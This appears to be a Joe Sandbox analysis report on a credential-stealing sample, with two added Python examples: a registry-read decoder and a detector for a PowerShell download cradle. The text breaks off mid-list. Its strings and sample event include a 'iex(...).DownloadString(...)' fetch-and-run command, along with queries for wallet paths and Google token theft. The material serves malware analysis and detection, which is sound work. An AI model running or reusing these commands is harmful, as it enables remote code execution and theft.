• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: OpenProcess_memmove_memset
• String ID: N0ZWFt
• API String ID: 2647191932-431618156
• Opcode ID: 7aa80bbbcb20bf56e96c3d07eae92b085819e4a7b41d0a6bb39ed9d741eff0cb
• Instruction ID: 2805143cd0c5c558e6a06fa8509dcfcdcab0c865fe739ae8c572561f0acccda9
• Opcode Fuzzy Hash: 7aa80bbbcb20bf56e96c3d07eae92b085819e4a7b41d0a6bb39ed9d741eff0cb
• Instruction Fuzzy Hash: 9E5180B1D002689FDF30AF65CC85BEDB7B8AB45314F0041F9A208A7152DA756E88DF55
APIs
• ??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,00FEFEAD,?,00000000,00000000,?,?), ref: 00FEFBFE
• VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,00FEFEAD,?,00000000,00000000), ref: 00FEFC28
• ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 00FEFC75
• ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00FEFCCE
• VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 00FEFD26
• ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00FEFEAD,?,00000000,00000000,?,?), ref: 00FEFD37
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: MemoryProcessQueryReadVirtual
• String ID: @
• API String ID: 3835927879-2766056989
• Opcode ID: 6eb41064430d17aac5e6356850140a33cf091c7d56485a4e907f4d87a1ebe37b
• Instruction ID: ccb287c379e923152649f76ea6e82cdd2cfe215e74b7f381e344429a6c3e2c23
• Opcode Fuzzy Hash: 6eb41064430d17aac5e6356850140a33cf091c7d56485a4e907f4d87a1ebe37b
• Instruction Fuzzy Hash: 6741D132A00249EBDF219FA6DC45BDE7B76EB44760F208035FA04AA190D3798A55EB90
APIs
• __EH_prolog3_catch_GS.LIBCMT ref: 00FF24DD
• _memset.LIBCMT ref: 00FF2515
• OpenProcess.KERNEL32(00000410,00000000,?), ref: 00FF2529
• EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00FF2546
• GetModuleBaseNameA.PSAPI(00000000,?,?,00000104), ref: 00FF2563
• CloseHandle.KERNEL32(00000000), ref: 00FF256A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Process$BaseCloseEnumH_prolog3_catch_HandleModuleModulesNameOpen_memset
• String ID: <unknown>
• API String ID: 445794743-1574992787
• Opcode ID: 4beafc10a7a153bfc81587b5c19bca139e3014d248241529faa1c19e97333060
• Instruction ID: 472661390eca24c2ed35defddfc9c0bb6cf5d6404564b459a15ece6fe7c67ed4
• Opcode Fuzzy Hash: 4beafc10a7a153bfc81587b5c19bca139e3014d248241529faa1c19e97333060
• Instruction Fuzzy Hash: 78112A7294012DABDB22EF50CC85ADEB6B8BF09300F4440A1FB88E7150D7755E859F91
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00FE1A55
• HeapAlloc.KERNEL32(00000000), ref: 00FE1A5C
• RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00FE1AD9), ref: 00FE1A79
• RegQueryValueExA.ADVAPI32(00FE1AD9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00FE1A94
• RegCloseKey.ADVAPI32(00FE1AD9), ref: 00FE1A9D
Strings
• wallet_path, xrefs: 00FE1A8C
• SOFTWARE\monero-project\monero-core, xrefs: 00FE1A6F
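The API list above is the wallet-discovery routine in raw form: the stealer opens hive 80000001 (HKEY_CURRENT_USER) at SOFTWARE\monero-project\monero-core with samDesired 00020119, which decodes to KEY_READ | KEY_WOW64_64KEY (an explicit request for the 64-bit registry view from this 32-bit image), reads the wallet_path value into a 0xFF (255) byte buffer, and closes the key. The following script is an added example, not Joe Sandbox or Vidar/Stealc code: it parses lines in the report's own "API.MODULE(args), ref: ADDR" format (the sample lines are copied from this function's listing), decodes the HKEY and access-mask constants from their documented winreg.h values, and joins RegOpenKeyExA to the RegQueryValueExA that uses the same handle slot so an analyst gets one finding per registry value the sample reads. The regex and the handle-join heuristic are assumptions about how Joe Sandbox prints these lines, not a documented interface.

```python
"""Decode a Joe Sandbox 'APIs' listing into registry-read findings.

Added example; not Joe Sandbox or Vidar/Stealc code.  The line format and the
sample lines are taken from this report's Monero-wallet function; the constant
tables are the documented winreg.h values.  The regex and the handle-join
heuristic below are assumptions about the report layout.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Copied from the report's APIs list for the wallet_path function.
SAMPLE_APIS = """\
• GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00FE1A55
• HeapAlloc.KERNEL32(00000000), ref: 00FE1A5C
• RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\\monero-project\\monero-core,00000000,00020119,00FE1AD9), ref: 00FE1A79
• RegQueryValueExA.ADVAPI32(00FE1AD9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00FE1A94
• RegCloseKey.ADVAPI32(00FE1AD9), ref: 00FE1A9D
"""

# Assumed layout: optional bullet, optional "Part of subcall function X:" prefix,
# then API.MODULE(arg,arg,...), ref: ADDR
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Documented winreg.h constants.
HKEYS = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
    0x80000005: "HKEY_CURRENT_CONFIG",
}
KEY_READ = 0x20019  # READ_CONTROL | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY
KEY_BITS = [  # composite KEY_READ is tried first, then the single bits
    (KEY_READ, "KEY_READ"),
    (0x00001, "KEY_QUERY_VALUE"),
    (0x00002, "KEY_SET_VALUE"),
    (0x00004, "KEY_CREATE_SUB_KEY"),
    (0x00008, "KEY_ENUMERATE_SUB_KEYS"),
    (0x00010, "KEY_NOTIFY"),
    (0x00020, "KEY_CREATE_LINK"),
    (0x00100, "KEY_WOW64_64KEY"),
    (0x00200, "KEY_WOW64_32KEY"),
    (0x20000, "READ_CONTROL"),
]


@dataclass
class ApiCall:
    api: str
    module: str
    args: list = field(default_factory=list)
    ref: str = ""
    subcall: Optional[str] = None  # set when the call came from a subcall


def parse_apis(text: str) -> list:
    """Parse every matching 'API.MODULE(args), ref: ADDR' line; skip the rest."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            args = m.group("args").split(",") if m.group("args") else []
            calls.append(ApiCall(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls


def decode_sam(value: int) -> str:
    """Render a samDesired mask as OR-ed symbolic names; unknown bits stay as hex."""
    names, remaining = [], value
    for mask, name in KEY_BITS:
        if remaining & mask == mask:
            names.append(name)
            remaining &= ~mask
    if remaining:
        names.append(hex(remaining))
    return "|".join(names)


def registry_reads(calls: list) -> list:
    """Join RegOpenKeyExA to later RegQueryValueExA calls on the same handle slot.

    The report prints the phkResult pointer for the open and the same value as
    hKey for the query, so the two are matched on that argument (assumption).
    """
    open_keys, findings = {}, []
    for c in calls:
        if c.api == "RegOpenKeyExA" and len(c.args) >= 5:
            hive = HKEYS.get(int(c.args[0], 16), c.args[0])
            open_keys[c.args[4]] = (hive, c.args[1], int(c.args[3], 16))
        elif c.api == "RegQueryValueExA" and len(c.args) >= 6 and c.args[0] in open_keys:
            hive, subkey, sam = open_keys[c.args[0]]
            findings.append({
                "path": f"{hive}\\{subkey}",
                "value": c.args[1],
                "access": decode_sam(sam),
                "buffer_bytes": int(c.args[5], 16),
                "ref": c.ref,
            })
    return findings


if __name__ == "__main__":
    for finding in registry_reads(parse_apis(SAMPLE_APIS)):
        print(finding)
```

Run over the listing above it yields a single finding: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core, value wallet_path, access KEY_READ|KEY_WOW64_64KEY, 255-byte buffer, at ref 00FE1A94. The same key path and value name are what a registry-audit or Sysmon event ID 12/13 rule would pivot on when hunting for this wallet-discovery behaviour on endpoints.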
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Heap$AllocCloseOpenProcessQueryValue
• String ID: SOFTWARE\monero-project\monero-core$wallet_path
• API String ID: 3466090806-4244082812
• Opcode ID: 991ca2a32529bb280d976499ec5b07f2e3fbbb594f56c624d4b1fe1c7dfa6803
• Instruction ID: 047efdc2d80dc72cebf4df2d72e1c56fd83741b8fa16441363ae60c6b1553783
• Opcode Fuzzy Hash: 991ca2a32529bb280d976499ec5b07f2e3fbbb594f56c624d4b1fe1c7dfa6803
• Instruction Fuzzy Hash: BDF05E76640305BFEB208B91EC0EFAE7AB9EB80B04F644024F701E5188E6F15A449B64
APIs
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
• lstrlenA.KERNEL32(?), ref: 00FE9C45
  • Part of subcall function 00FF2042: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00FF6B0E,?), ref: 00FF205A
• StrStrA.SHLWAPI(00000000,AccountId), ref: 00FE9C62
• lstrlenA.KERNEL32(?), ref: 00FE9D11
• lstrlenA.KERNEL32(?), ref: 00FE9D2C
  • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
  • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
  • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
  • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
  • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
  • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcpylstrlen$lstrcat$AllocLocal
                                                                                                                                                                                                                                                          • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                                                                                          • API String ID: 3306365304-1713091031
                                                                                                                                                                                                                                                          • Opcode ID: a10a0e1a11f63eca3e5054fa528d301215f87e15206eec21a957b1e6d38b48d7
                                                                                                                                                                                                                                                          • Instruction ID: f7723821b9d0617f8e3133eb024ac191b2c83d10ff6dd7d623231524ca22a8f5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a10a0e1a11f63eca3e5054fa528d301215f87e15206eec21a957b1e6d38b48d7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB81F632900159ABCF40FBB6ED469EEB774AF04304F510421FA00B7166DBBABE45ABD0
APIs
• type_info::operator==.LIBVCRUNTIME ref: 6CD64285
• ___TypeMatch.LIBVCRUNTIME ref: 6CD64393
• CallUnexpected.LIBVCRUNTIME ref: 6CD64500
Strings
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
• Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: CallMatchTypeUnexpectedtype_info::operator==
• String ID: csm$csm$csm
• API String ID: 1206542248-393685449
• Opcode ID: 1a7227f8a6beeb7cad78df4554e20b88dd6cbd64e0bb3943ea998c1dc4eebcd9
• Instruction ID: 2d6dc12a98580103cdde8be4c93634aed3c8f50c289a4f938a0cd733b5b94042
• Opcode Fuzzy Hash: 1a7227f8a6beeb7cad78df4554e20b88dd6cbd64e0bb3943ea998c1dc4eebcd9
• Instruction Fuzzy Hash: C1B1AE75801209EFCF05CFA6C8909DEBBB5FF08318F24465AE8106BE21D771EA55CBA1
APIs
• SetLastError.KERNEL32(00000000), ref: 6CD4AD37
• GetEnvironmentVariableW.KERNEL32(?,00000002,00000000), ref: 6CD4AD42
• GetLastError.KERNEL32 ref: 6CD4AD4E
• GetLastError.KERNEL32 ref: 6CD4AD60
Strings
• internal error: entered unreachable codeassertion failed: self.is_char_boundary(new_len)/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\string.rs, xrefs: 6CD4AEC3
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
• Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: ErrorLast$EnvironmentVariable
• String ID: internal error: entered unreachable codeassertion failed: self.is_char_boundary(new_len)/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\string.rs
• API String ID: 2691138088-1921098361
• Opcode ID: 841b54c9bfa255c83020ec056c58db4ebba05f7cc92109e6fad8f1e084f1bd2a
• Instruction ID: c8f9c4958f8fce1d1d83ff28d1690f7f40a8a5329124a59980f278b294c9e4c1
• Opcode Fuzzy Hash: 841b54c9bfa255c83020ec056c58db4ebba05f7cc92109e6fad8f1e084f1bd2a
• Instruction Fuzzy Hash: E7A19CB5E00219DFEB10CF94DC45B9EBBB9BF48718F144124EA18BB761E7309948CBA0
APIs
• SetLastError.KERNEL32(00000000), ref: 6CD4AAA7
• GetCurrentDirectoryW.KERNEL32(00000000,00000002), ref: 6CD4AAAF
• GetLastError.KERNEL32 ref: 6CD4AABB
• GetLastError.KERNEL32 ref: 6CD4AACD
• GetLastError.KERNEL32 ref: 6CD4AB5D
Strings
• internal error: entered unreachable codeassertion failed: self.is_char_boundary(new_len)/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\string.rs, xrefs: 6CD4AB8A
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
• Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: ErrorLast$CurrentDirectory
• String ID: internal error: entered unreachable codeassertion failed: self.is_char_boundary(new_len)/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\alloc\src\string.rs
• API String ID: 3993060814-1921098361
• Opcode ID: 98f8167fda4f1bb0c2db178868d9db81449babb320ceeab1c162ba6e010fb0b0
• Instruction ID: 7994b3eaa615d54691d32d71b46b23d5bf6546d585ffd4f806ac1163290cfbf9
• Opcode Fuzzy Hash: 98f8167fda4f1bb0c2db178868d9db81449babb320ceeab1c162ba6e010fb0b0
• Instruction Fuzzy Hash: 2D51F5B1D006189BEB10CF98D989BEEBBB9AF49714F148125E908B7750E7749908CBA1
APIs
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
  • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
  • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
  • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
  • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
  • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
  • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
  • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
• ShellExecuteEx.SHELL32(?), ref: 00FF308F
Strings
• .ps1, xrefs: 00FF2FC2
• -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00FF2FE7
• C:\ProgramData\, xrefs: 00FF2F72
• C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00FF302A
• ')", xrefs: 00FF2FE2
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                                                                                                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          • API String ID: 2215929589-1989157005
                                                                                                                                                                                                                                                          • Opcode ID: cf1593323465116a95a21a3475c1557c006fdba61382aaa93de7a766626b3fd3
                                                                                                                                                                                                                                                          • Instruction ID: 67e7137c35237983837848a5de4156bf47954c74cde0e2e62bbff184e31e771a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf1593323465116a95a21a3475c1557c006fdba61382aaa93de7a766626b3fd3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A641B732D0021D9ACF50FBA6DC829DDB7B8BF04700F514566FA40B7122DBB97E46AB80
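The strings of the function above are the pieces of a PowerShell download cradle: the SysWOW64 powershell.exe path, the argument fragment -nop -c "iex(New-Object Net.WebClient).DownloadString(', the closing ')", and a .ps1 name under C:\ProgramData\, launched through ShellExecuteEx. The URL is filled in at run time and the report does not show how the .ps1 path and the cradle are combined, so the detection below scores each fragment independently. This is an added example and not code from the report or from the sample; the event field names, the parent-process heuristic, the three-indicator threshold and the sample events (TEST-NET URL, file names, PIDs) are assumptions made for the example.

```python
"""Score Windows process-creation events for the PowerShell download cradle
whose fragments appear in the strings above. Added example, not part of the
Joe Sandbox report; event layout, thresholds and sample data are assumed."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# One pattern per cradle fragment seen in the report's strings. Names are
# labels for this example only.
INDICATORS = {
    "wow64_powershell": re.compile(
        r"\\SysWOW64\\WindowsPowerShell\\v1\.0\\powershell\.exe", re.I),
    "noprofile": re.compile(r"(?<![\w-])-nop(?:rofile)?\b", re.I),
    "command_flag": re.compile(r"(?<![\w-])-c(?:ommand)?\b", re.I),
    "iex": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "webclient_download": re.compile(
        r"New-Object\s+(?:System\.)?Net\.WebClient\)?\s*\.DownloadString\(", re.I),
    "programdata_ps1": re.compile(r"C:\\ProgramData\\[^\s\"']+\.ps1", re.I),
}
# Parent executable in a user-writable location (assumed heuristic; the
# dropper ran from the desktop in the sandbox).
UNTRUSTED_PARENT = re.compile(r"^(?:C:\\Users\\|C:\\ProgramData\\|.*\\Temp\\)", re.I)
# Pulls the staged URL out of DownloadString('...') for blocking.
URL_IN_CRADLE = re.compile(r"DownloadString\(\s*['\"]([^'\"]+)['\"]", re.I)


@dataclass
class Verdict:
    pid: int
    label: str
    indicators: list = field(default_factory=list)
    url: str | None = None


def analyze(event: dict) -> Verdict:
    """Score one event with keys pid, image, command_line, parent_image."""
    text = event["image"] + " " + event["command_line"]
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if UNTRUSTED_PARENT.search(event["parent_image"]):
        hits.append("untrusted_parent")
    m = URL_IN_CRADLE.search(event["command_line"])
    url = m.group(1) if m else None
    # A remote string fed to Invoke-Expression is the cradle itself; anything
    # else is judged on how many fragments co-occur (threshold is assumed).
    if {"iex", "webclient_download"} <= set(hits):
        label = "download_cradle"
    elif len(hits) >= 3:
        label = "suspicious"
    else:
        label = "benign"
    return Verdict(event["pid"], label, hits, url)


def triage(events: list) -> list:
    return [analyze(e) for e in events]


PS_WOW64 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PS_NATIVE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events. The URL is a TEST-NET address and the script and
# parent names are invented; none of them are indicators from the report.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": PS_WOW64,
     "parent_image": r"C:\Users\user\Desktop\njrtdhadawt.exe",
     "command_line": f'"{PS_WOW64}" -nop -c "iex(New-Object Net.WebClient)'
                     ".DownloadString('http://203.0.113.10/stage2.ps1')\""},
    {"pid": 4188, "image": PS_NATIVE,
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "powershell.exe -NoProfile -ExecutionPolicy Bypass "
                     r"-File C:\ProgramData\Corp\Maintenance\cleanup.ps1"},
    {"pid": 4210, "image": PS_NATIVE,
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell.exe -Command "Get-Service -Name Spooler"'},
    {"pid": 4302, "image": PS_WOW64,
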